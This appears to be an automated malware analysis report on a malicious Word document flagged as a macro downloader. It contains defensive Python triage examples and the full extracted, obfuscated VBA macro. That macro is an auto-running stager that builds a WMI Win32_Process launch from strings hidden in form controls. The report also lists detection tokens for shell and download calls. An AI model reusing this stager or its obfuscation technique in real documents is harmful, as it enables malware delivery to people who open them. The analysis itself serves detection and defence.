Verdict: MALICIOUS
Risk score: 232
Heuristics: 8

ClamAV: Doc.Downloader.Sagent-7464899-0 (critical, CLAMAV_DETECTION)
ClamAV detected this file as malware: Doc.Downloader.Sagent-7464899-0.

VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings)
The document contains VBA macro code.

VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER)
A VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Matched line in script:
Gpyeudldhk = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Xofpburdpzfhw.Stdyjyjgeeusl + "rocess"
Join(Split(s, d), "") simply deletes every occurrence of the delimiter d from s; here d is the literal assigned to hb32bmmejdn a few statements earlier in Xeqdkxosuz, and what survives is winmgmts:Win32_. The text of the TextBox Xofpburdpzfhw.Stdyjyjgeeusl (stored in the form, not in the VBA source) and the literal "rocess" are then appended. winmgmts: is the WMI moniker prefix, so the decoded variable names a WMI class, and the four-argument Yxosoplxru.Create(...) loop later in Xeqdkxosuz is the launch, with its command line assembled by Anjcjozq from members of the form Jjhofdqxiurkk.

CreateObject call (high, OLE_VBA_CREATEOBJ)
Matched line in script:
Set Yxosoplxru = VBA.CreateObject(JJKBSKJ + Gpyeudldhk)
JJKBSKJ appears nowhere else in the extracted source and there is no Option Explicit, so it is an Empty variant that contributes nothing to the concatenation; the moniker passed to CreateObject is Gpyeudldhk alone.

VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing is what flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the finding's detail line. In this sample the pair is Document_open and CreateObject, and both are also visible in the decoded source below.

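The two findings above describe detection shapes without showing the check. The Python below is an added example, not the analyzer's own code: it applies the same token pairing to a decoded VBA blob, statically evaluates the Join(Split(...), "") assignment to recover the literal it hides, and lists the hidden UserForm property reads. The token lists are copied from the finding descriptions; the input is a constructed excerpt of the stager lines from the preview below with the filler statements removed; the regexes, dictionary keys and function names are this example's own.

```python
import re

# Constructed excerpt of the decoded macro: the stager lines quoted in the
# findings above, with the filler statements between them removed.
SAMPLE_VBA = r'''Private Sub Document_open()
Xeqdkxosuz
End Sub
Function Xeqdkxosuz()
hb32bmmejdn = "23nNNgi3_7&&jjNN#"
Gpyeudldhk = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Xofpburdpzfhw.Stdyjyjgeeusl + "rocess"
Set Yxosoplxru = VBA.CreateObject(JJKBSKJ + Gpyeudldhk)
Bleyiybjgz = Gpyeudldhk + Jjhofdqxiurkk.Spwozngegd.ControlTipText + Jjhofdqxiurkk.Bvtcydyvdjcvx.ControlTipText
Do While Yxosoplxru.Create(UJNDB & Anjcjozq, Dsutdmkeefyq, Xeqdkxosuz, Cfakhorxp)
Loop
End Function
'''

# Token lists taken from the OLE_VBA_PCODE_AUTOEXEC_EXEC finding description.
AUTOEXEC = re.compile(
    r"\b(Auto_Open|AutoOpen|Document_Open|Workbook_Open|Auto_Close|AutoClose)\b", re.I)
EXEC_TOKENS = re.compile(
    r"\b(Shell|CreateObject|GetObject|PowerShell|cmd\.exe|URLDownloadToFile|WinHttp"
    r"|XMLHTTP|ADODB\.Stream|ShellExecute|ExecuteExcel4Macro)\b", re.I)
# Hidden UserForm properties named in the OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER finding.
HIDDEN_PROPS = re.compile(r"\b(\w+(?:\.\w+)*)\.(ControlTipText|Tag|Pages|HelpContextId)\b")
# Join(Split(<literal concatenation>, <delimiter literal or variable>), "")
JOIN_SPLIT = re.compile(r'Join\(Split\((.+?),\s*(\w+|"[^"]*")\),\s*""\)')


def resolve_delimiter(token, source):
    """Delimiter is an inline literal or a variable assigned a literal elsewhere."""
    if token.startswith('"'):
        return token.strip('"')
    m = re.search(r'^\s*' + re.escape(token) + r'\s*=\s*"([^"]*)"\s*$', source, re.M)
    return m.group(1) if m else None


def decode_join_split(source):
    """Statically evaluate `var = Join(Split(...), "") + ...` assignments.

    Returns {variable: decoded text}. Terms that are not string literals (here the
    TextBox value Xofpburdpzfhw.Stdyjyjgeeusl, which lives in the form storage and
    not in the VBA source) are kept as <Name> placeholders rather than guessed.
    """
    decoded = {}
    for line in source.splitlines():
        m = re.match(r"^\s*(\w+)\s*=\s*(.*)$", line)
        if not m or "Join(Split(" not in line:
            continue
        var, rhs = m.group(1), m.group(2)
        js = JOIN_SPLIT.search(rhs)
        if js is None:
            continue
        delim = resolve_delimiter(js.group(2), source)
        if not delim:
            continue
        # Split on the delimiter and re-join with "": every delimiter occurrence is deleted.
        literal = "".join(re.findall(r'"([^"]*)"', js.group(1)))
        inner = "".join(literal.split(delim))
        # Substitute the evaluated call, then fold the remaining "+" terms left to right.
        rest = rhs[:js.start()] + '"' + inner + '"' + rhs[js.end():]
        parts = []
        for lit, ref in re.findall(r'"([^"]*)"|([\w.]+)', rest):
            parts.append("<" + ref + ">" if ref else lit)
        decoded[var] = "".join(parts)
    return decoded


def triage(source):
    """Run the two pairing heuristics from the report over one decoded VBA blob."""
    autoexec = sorted({m.group(1) for m in AUTOEXEC.finditer(source)})
    exec_tokens = sorted({m.group(1) for m in EXEC_TOKENS.finditer(source)})
    hidden = sorted({m.group(1) + "." + m.group(2) for m in HIDDEN_PROPS.finditer(source)})
    decoded = decode_join_split(source)
    return {
        "autoexec": autoexec,
        "exec_tokens": exec_tokens,
        # OLE_VBA_PCODE_AUTOEXEC_EXEC fires on the pairing only, never on one token alone.
        "pcode_pair": bool(autoexec and exec_tokens),
        "hidden_props": hidden,
        "decoded": decoded,
        # OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER shape: auto-exec entry point, CreateObject
        # fed from a decoded variable, and command text read back from hidden form properties.
        "userform_stager": bool(autoexec and hidden and decoded
                                and any(t.lower() == "createobject" for t in exec_tokens)),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

The decoder deliberately leaves Xofpburdpzfhw.Stdyjyjgeeusl as a placeholder: the TextBox's text is stored in the form's storage streams, which the report does not show. If that text is the single character P the moniker reads winmgmts:Win32_Process, which would fit the four-argument Yxosoplxru.Create(...) call (Win32_Process.Create takes CommandLine, CurrentDirectory, ProcessStartupInformation, ProcessId), but that is an inference, not something the extracted source proves; dumping the form streams from the OLE container (for example with oledump) is the way to confirm it.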
Document_Open macro (low, OLE_VBA_DOCOPEN)
Matched line in script:
Private Sub Document_open()

Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms. Here that file is the macros.bas listed under Extracted artifacts.

Embedded URL (info, EMBEDDED_URL)
One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier found in ordinary Office files and is not an indicator on its own.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11211 bytes |

SHA-256: 6b95ff559c32f4e905dba213520798fe8defd4f47c7aed07ea1386869081b506

Detection
ClamAV: No threats found. The Doc.Downloader.Sagent-7464899-0 signature above matched the parent document, not this decoded VBA source, so scanning macros.bas on its own will not reproduce that hit.
Obfuscation or payload: likely. 306 of 518 identifiers look randomly generated (e.g. 'Yyphimcifgfxh'), consistent with name-mangling obfuscation.
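The 306-of-518 figure comes from the analyzer's own identifier test, which the report does not describe. As an added illustration, not the analyzer's code, the Python below applies one simple stand-in heuristic (long names with a run of four or more consonants, or almost no vowels) to a constructed excerpt of the preview below; the keyword list, thresholds and function names are this example's assumptions.

```python
import re

# Constructed excerpt of the extracted macro source shown in the preview below.
SAMPLE_VBA = '''Attribute VB_Name = "Xofpburdpzfhw"
Private Sub Document_open()
Dim Sxgzpagdcgoix As Integer
Ydsildpgokbyx = ("Voluptatibus quaerat.")
Set Yxosoplxru = VBA.CreateObject(JJKBSKJ + Gpyeudldhk)
Xeqdkxosuz
End Sub
'''

# VBA keywords, types and library names that occur in any macro; they are never
# user-chosen, so they are excluded before scoring (assumed list, extend as needed).
KEYWORDS = {
    "attribute", "private", "public", "sub", "function", "end", "dim", "as", "set",
    "let", "if", "then", "else", "elseif", "for", "next", "to", "each", "do", "while",
    "loop", "until", "exit", "call", "with", "new", "nothing", "true", "false", "and",
    "or", "not", "integer", "string", "boolean", "double", "long", "variant", "object",
    "vba", "createobject", "getobject", "join", "split", "msgbox", "option", "explicit",
}
VOWELS = set("aeiou")


def identifiers(source):
    """Collect user-chosen identifiers, ignoring string literals and comments."""
    names = set()
    for line in source.splitlines():
        if line.lstrip().startswith("'"):
            continue
        line = re.sub(r'"[^"]*"', '""', line)  # the lorem-ipsum filler must not count
        for tok in re.findall(r"\b[A-Za-z_]\w*\b", line):
            if tok.lower() not in KEYWORDS:
                names.add(tok)
    return names


def looks_random(name, min_len=8):
    """Heuristic: a long name with a 4+ consonant run, or almost no vowels, is not
    something a developer typed. Assumed stand-in for the analyzer's own test."""
    s = name.lower().strip("_")
    if len(s) < min_len:
        return False
    run = best = 0
    for ch in s:
        if ch.isalpha() and ch not in VOWELS and ch != "y":
            run += 1
            best = max(best, run)
        else:
            run = 0
    vowel_ratio = sum(c in VOWELS for c in s) / len(s)
    return best >= 4 or vowel_ratio < 0.2


def mangling_score(source):
    """Return (flagged, total, flagged_names) in the report's '306 of 518' shape."""
    names = identifiers(source)
    flagged = sorted(n for n in names if looks_random(n))
    return len(flagged), len(names), flagged


if __name__ == "__main__":
    flagged, total, names = mangling_score(SAMPLE_VBA)
    print(f"{flagged} of {total} identifiers look randomly generated: {names}")
```

Short mangled names such as JJKBSKJ fall under the length floor and are missed, which is why a heuristic like this reports a fraction rather than a clean verdict; the ratio, not any single identifier, is the signal.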
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "Xofpburdpzfhw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Stdyjyjgeeusl, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Grneykakqgy = Ejfradbgyxu
Tooxdorvhcgb = 501
Ydsildpgokbyx = ("Voluptatibus quaerat.")
Huteerlvsc = (213)
Dim Sxgzpagdcgoix As Integer
Dim Zevfqxlzin As Integer
Dim Gmhzgbgxiilmy As Boolean
Dim Hbgkgyemrxx As Integer
Dim Hyymrezqvgihq As Boolean
Dim Qtjhzhdyc As Boolean
Dim Wcaqcjiiqkj As Double
Tramuxcpqzvy = (833)
Dim Trdawjahxqf As Integer
Yirthtonhgrde = ("Qui et laborum aspernatur aut eum quasi omnis reiciendis consequuntur.")
Gcerotpq = (920)
Dim Nptmujhqye As Boolean
Foeycmkmwsjzb = Npfjsfjtev
Xkmfvuhwpnp = Fznvguly
Atvotwvadazn = "Magnam et pariatur nulla."
Mneuzwzang = 894
Fjiyslwpq = Dtgaecgrlrwl
Tooyozyyztppl = 872
Vnuuobyezveg = ("Adipisci quidem.")
Njybzywh = (976)
Dim Mvetmkor As Boolean
Dim Qebqsxvkodjth As Integer
Dim Krnlrxnwsi As Double
Dim Erpgnpukjhhjb As Double
Dim Tntsngibsb As Integer
Dim Ycijizbrszxwd As Integer
Dim Cdjekoluiyp As Double
Wpwfgrvhbxz = (171)
Dim Mtuqxpar As String
Jwvknizlsukuc = ("Asperiores expedita sit tenetur.")
Pmrgafkujcrz = (243)
Dim Aezqrnil As Boolean
Zbmgpqrrr = Cilftybli
Gjsplelpj = Jgytdftka
Uxvnkxohzymr = "Quod illum vel."
Nzfmfcod = 6
Oudbqxfpxgt = Utahwrjh
Wuwpjfjetnc = 13
Ufpaomaunacjb = ("Fuga magni voluptatem.")
Xdsfhehgu = (830)
Dim Jnbarycwgbgq As String
Dim Gvjtuginegqu As Boolean
Dim Smzussdnsm As Double
Dim Gemcqmxk As Boolean
Dim Ynzamwjukw As Integer
Dim Etcmycrtcwjr As Boolean
Dim Acqdxlji As Double
Urfhexcnbp = (622)
Dim Aeovtihcdiaj As Double
Egyqivfqr = ("Quaerat.")
Jpeuwqkdiblpc = (253)
Dim Blimqwmx As Boolean
Olgfnjniyjtc = Sqgnfsrwx
Uiepzxrlyhfe = Sygdihydbtaq
Aesnzksbiszl = "Eius nostrum voluptatum."
Iynmirmukso = 433
Xeqdkxosuz
End Sub
Attribute VB_Name = "Jjhofdqxiurkk"
Attribute VB_Base = "0{15954FE8-24E7-4CA3-9B30-1D177D7A8905}{88032DE1-B386-4B50-A288-4C0B5E3EA6CA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Wvynevhrwqz"
Function Anjcjozq()
Xigrbjqkmxns = Xlcwvsiso
Ytjhbvsdsnmlv = 723
Ptppodxz = ("Quam tempore dolores.")
Wqcnmftirdpg = (766)
Dim Cupbskzgyt As Boolean
Dim Cykvaufmefq As String
Dim Hsdduliqe As Boolean
Dim Owgtuprjjxcu As Boolean
Dim Cvaqgxezvkrwc As String
Dim Uyxlqhenm As Double
Dim Nhgifyfhsqi As Double
Qpobwbymnboye = (49)
Dim Oyioxrjxt As Integer
Trvlrmzzu = ("Voluptate.")
Drkucafsjaox = (971)
Dim Hubhhsvoqhgr As Integer
Bzeogwvrdd = Rbceeucrj
Snjxoadnlzuqj = Qwyprysyaummc
Jajcmbwzgrz = "Enim aut et voluptas."
Jwksiedg = 981
Lnkulqkjltpjq = Xofpburdpzfhw.Stdyjyjgeeusl
Fierzypl = Dnicxrxwqu
Gcudinzsw = 542
Enzgkrrj = ("Itaque harum incidunt quae qui natus.")
Rsyxypeu = (586)
Dim Clbbbxwpcmfq As Integer
Dim Dpxlmeylod As Double
Dim Vgjyuxyfat As Boolean
Dim Fnvbhovbontjs As String
Dim Svrwxmrbq As Integer
Dim Rirykjcz As Integer
Dim Jwezinvimafbp As Integer
Jwolnmfwcw = (987)
Dim Pdkgsmjjyn As String
Zwsefypsmpa = ("Aaron")
Osmeabcvdff = (695)
Dim Mpfvlwzzmrta As Boolean
Huxacxseu = Xlvtvrncl
Mqdenocb = Jwvbgece
Uiqnkegqz = "Atque beatae ipsam."
Fsghgxyjdcseb = 566
Rsnsbdgdv = Lnkulqkjltpjq + Jjhofdqxiurkk.Xsfedjxbjc + Jjhofdqxiurkk.Mdeidzxkn + Jjhofdqxiurkk.Wcilntyaqhw
Ucokmspkuqngp = Qwevphuah
Rzvvhwfh = 85
Jtmtbnlewi = ("Esse quam laboriosam quo consectetur sunt modi.")
Aysmxlrzb = (769)
Dim Mapoyirbh As String
Dim Hcrcntjwkuykz As String
Dim Uytpiicl As Double
Dim Mymvfguscrqu As Boolean
Dim Ypfwooqqrvosi As Double
Dim Perrkbuxa As Double
Dim Erwfmzevqsd As Integer
Lcvhqhnxbmnmy = (474)
Dim Xdsfqajzum As Integer
Nnbnmzughfn = ("Veronica")
Sqceisnwtxma = (385)
Dim Wbdbugszkay As Double
Ewcrqlmykhu = Wsuponokyeee
Atfcgheizrgwo = Mujpakzfull
Fsxmxmlf = "Reprehenderit beatae ea."
Ndpntcisz = 839
Mnqvtmkdzrnn = Rsnsbdgdv + Jjhofdqxiurkk.Oqpuqkwryefz + Jjhofdqxiurkk.Ujgxavhcswol.Factoid
Mtuxzojapnbtz = Ftpjyuboqqb
Optyaifcrb = 224
Asukrdtzdoul = ("Natus ut enim.")
Dledhyvz = (844)
Dim Uctqzlosroycg As String
Dim Nhsgauhewfuxn As Integer
Dim Zbgupokc As String
Dim Zcuffaeaetqc As String
Dim Emyxkfnbyq As Integer
Dim Vmokcfsoasnzq As Integer
Dim Wiakwivqdqn As Integer
Dyeeqifsmtrl = (645)
Dim Lmzygfpr As Boolean
Fsoavlupmxkbo = ("Quo quis.")
Iaxkojzmfj = (442)
Dim Rgmfmggy As String
Ewbzbymsjyqp = Sgeoggiqr
Jasyvhll = Ajphbamagnci
Fbrrrlnftw = "Velit."
Tuoqedkjrxogf = 773
Anjcjozq = Ifqiqcmh + Mnqvtmkdzrnn + Ifqiqcmh
Rynumidrot = Wquqxrcf
Enmpaljnmvu = 988
Dccmrqzcwtms = ("Sunt deserunt inventore.")
Kubjhzdta = (258)
Dim Hribhiiwxrnuf As Integer
Dim Nlitzxwgzsk As Double
Dim Apkcuojyrb As Boolean
Dim Dvhnwawysm As String
Dim Gialljixvv As String
Dim Hlarbqwks As Integer
Dim Botcsoouowyvm As Boolean
Nhtrpiazgkzfx = (433)
Dim Isymywsgpjh As Double
Kipoccdoq = ("In hic eveniet ullam aspernatur ea consequatur.")
Obpmrsirsxog = (696)
Dim Qcvbdiigsoyvl As Integer
Xbrrgyxgfowa = Jwbsomaimn
Hiaowggwuw = Qbsvpnghrxi
Cxqupoeywqogq = "Ratione reprehenderit minus repudiandae tempora."
Utonzmbntes = 390
End Function
Function Xeqdkxosuz()
Thhadkhpjfl = Ehmfaomrqyb
Ggpnzofvzrl = 99
Hnpgycknt = ("Dolor eaque.")
Aabywdjfdmdba = (598)
Dim Wcsepauvg As String
Dim Jzymdnds As Double
Dim Ngzwifhsdmoks As Integer
Dim Upnwgeuyt As Boolean
Dim Gqiqxhigjv As String
Dim Humddnnyg As Boolean
Dim Jypwgusif As Double
Yrjnohbmwmahg = (43)
Dim Brlgvdolzshl As String
Qnofjvuupy = ("Cumque et excepturi excepturi minus ea tempora ratione ut.")
Uwsjqjumtbwzg = (386)
Dim Fkvgvzafzm As String
Fzgbmzzjstpby = Spqozolpjus
Tqswompnmzkzh = Mutifjipjxci
Wgupcqbatm = "Voluptatum."
Cfpgpsdt = 191
hb32bmmejdn = "23nNNgi3_7&&jjNN#"
Gpyeudldhk = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Xofpburdpzfhw.Stdyjyjgeeusl + "rocess"
Dmcvvyrtlwj = Ajcwimdhjlgxt
Gmadxtxuohev = 544
Bjphqplekfl = ("Possimus aut.")
Tavybkvmy = (726)
Dim Leconpdqz As Boolean
Dim Crqcyjbcv As Boolean
Dim Ndusidkicdni As Double
Dim Mwrvbvfnmy As String
Dim Ymmkwaorr As Double
Dim Ugafqpeoiuql As String
Dim Gtwnzrvoae As Integer
Sgnteuocwoapp = (641)
Dim Kwohbzzqg As String
Rgzggvhu = ("Ipsa.")
Bopvxkorshybj = (947)
Dim Lwwwsqgbzdhc As Integer
Fhvakiiym = Lynlfpxopvy
Fhumqsphzjnzd = Bjmksggstquoj
Mgwxvdov = "Hic."
Oimozlbozmfi = 590
Set Yxosoplxru = VBA.CreateObject(JJKBSKJ + Gpyeudldhk)
Auopscfh = Nwkydiwywy
Wuhyzguglp = 380
Sulkrfvhhohow = ("Delectus sint magnam expedita consequuntur impedit nam quas corrupti.")
Ozsjccnyuhtcy = (269)
Dim Axfkgjwm As Boolean
Dim Dteimtbmjfgs As Double
Dim Xfwrcxcxtfn As Double
Dim Mhornlrzii As Double
Dim Osqohvhsr As String
Dim Mfjkogaz As Integer
Dim Kpfvnthn As Boolean
Xgjofmimjfr = (211)
Dim Gbmdactiiufdc As Boolean
Ucaecxdgvvfc = ("Molestiae eius aut temporibus.")
Qpktqztbqhk = (709)
Dim Omekccprh As Boolean
Obcvrhuavus = Kllzslsthrpt
Caivijxeox = Imkalwhjaq
Zvmthknbawr = "Numquam."
Yjvxfxoajcg = 461
Bleyiybjgz = Gpyeudldhk + Jjhofdqxiurkk.Spwozngegd.ControlTipText + Jjhofdqxiurkk.Bvtcydyvdjcvx.ControlTipText
Gmppxwmjsu = Xlrpvirxh
Nlbdriqqr = 744
Qnzrscciyq = ("Et distinctio dolorem quia.")
Vajiqhkwb = (512)
Dim Cewtvbcek As Boolean
Dim Veqdqpvyep As Boolean
Dim Gdiazihbk As Boolean
Dim Wnwjghwmf As Double
Dim Efsmrubczq As Integer
Dim Ppnacvcibiwtq As Integer
Dim Orhdshwzc As String
Rmzhnrrngtt = (116)
Dim Qcohwiywxonl As Double
Mstqktpeqi = ("Victoria")
Ebcmmuknmpsp = (426)
Dim Irtymwvefvnd As String
Emmfobdxtkb = Eawzdmqk
Swwzawhzjl = Admabqlyiw
Reivjqtcgaujr = "Qui minus."
Allsgdvz = 4
Zcrymmqj = Bleyiybjgz + Xofpburdpzfhw.Stdyjyjgeeusl
Dyiceexn = Psrftijqm
Npsxyypagj = 309
Fppzimugvsuac = ("In qui ut.")
Blvnltopj = (324)
Dim Ggimnwatm As String
Dim Iaesnqvv As Double
Dim Ptnpkvdgqzfj As Double
Dim Oyiexajwo As Double
Dim Vjtfxuox As Boolean
Dim Mvxcbxmvqyz As Boolean
Dim Ephqxrksfpmpl As Boolean
Tfrlsocc = (219)
Dim Wdxaxzdy As Integer
Qpdrfayhfkn = ("Provident odit sapiente.")
Kckhnejcmwo = (538)
Dim Mrhqjqauldb As Integer
Rpuwaohpm = Spubmdtprr
Zpbxpszyj = Mthpwzszz
Xuvyhhklioei = "Et omnis occaecati consequatur eius repudiandae tenetur nesciunt adipisci eos."
Yqsxnzdkh = 881
Set Xeqdkxosuz = CreateObject(Zcrymmqj)
Fuyprikbxnsi = Pngpxakwbbd
Fxrifwmtmy = 484
Nfdxzhaknl = ("Odit nobis adipisci inventore.")
Buwijsxmuze = (260)
Dim Fnlbucofg As Double
Dim Hzbtdmvtwbhk As Boolean
Dim Ktbnonaz As Integer
Dim Toitimkvkbbj As Double
Dim Jielhfyd As String
Dim Kjnsrwuhigzoe As Integer
Dim Jqlaybabxe As Integer
Oslwqckjzz = (116)
Dim Ogualeue As Integer
Xomcmwjh = ("Debitis soluta.")
Lmgpwjjltsl = (498)
Dim Ilshzqtjchnvx As Integer
Pnzsjerbafd = Ikjpmqdrupkq
Jfstzyvw = Tbtqkrcvpxar
Ighwuypblbiwh = "Reiciendis necessitatibus optio in quas et tenetur."
Czmeqwkx = 547
Xeqdkxosuz.XSize = False
Vceqxzpelljm = Mcnscblnsln
Fqmemnizkegl = 646
Xfrjemhdd = ("Jennie")
Zpihksddf = (548)
Dim Zhxzercxhgt As Double
Dim Iabigmcnyzm As Double
Dim Rzmdhdwjgjmeh As Integer
Dim Fgxgtuzj As Integer
Dim Wtgabhlaezcl As Integer
Dim Pydcrpdzwbhrc As String
Dim Fspvikkpj As Integer
Becqyucy = (817)
Dim Rxsbrxwftjff As Double
Gmpvoejtxpozw = ("Quo impedit.")
Modnjnvx = (581)
Dim Nnkqvwvicjl As String
Knmxzdnra = Gubrmllp
Aqydcssru = Hitaxqvtgznw
Auewryvjcj = "Mike"
Txlvagujymh = 866
Xeqdkxosuz.YSize = False
Xskqrqlf = Chtwhpvxk
Cntymclfwhv = 350
Jwmnrxphd = ("Mollitia.")
Xahywqjfpnue = (595)
Dim Fnzavzhhkmlc As String
Dim Mvjysablv As String
Dim Gyqkuprvvl As Boolean
Dim Ghwlppunthc As Double
Dim Dvmqqtrnqpaq As Integer
Dim Xthmucfcrvp As Boolean
Dim Azpyvxqrteeer As Boolean
Psvusaxt = (247)
Dim Hpoberbfxqnb As Boolean
Shydpcicj = ("Wendy")
Zzvtvcfcdo = (190)
Dim Qpnczubo As Boolean
Qbkbuejn = Lofrglcnh
Qkfiobziiin = Juitibtpjbqbj
Ornhqnzqftfck = "Corporis est labore perspiciatis corrupti excepturi magnam in quisquam."
Yyphimcifgfxh = 210
Do While Yxosoplxru.Create(UJNDB & Anjcjozq, Dsutdmkeefyq, Xeqdkxosuz, Cfakhorxp)
Loop
Mahtodwb = Xfobwslkchll
Etlnfxqxbqwhe = 643
Ruuvufwnz = ("Dolorem corrupti.")
Otciqafio = (206)
Dim Jwuczeyepnzc As String
Dim Rqatigmcxi As Integer
Dim Tawcvxmakyar As Boolean
Dim Puvtoqrvykep As Double
Dim Egymfekyinr As Boolean
Dim Lbtpioqqshd As Integer
Dim Dxbmxgryv As Integer
Olagrliclagtf = (401)
Dim Apymzvrzanwwp As Integer
Rpxtbxnjyh = ("Numquam consequatur.")
Ifxevsbf = (307)
Dim Jedwmztuosqai As Integer
Lsynfzfatjudi = Nfjsgtpek
Esgkhwgijzd = Aeeknrwktkflr
Cvnnzovmui = "Dolorum at impedit."
Warekmlrcofrt = 40
End Function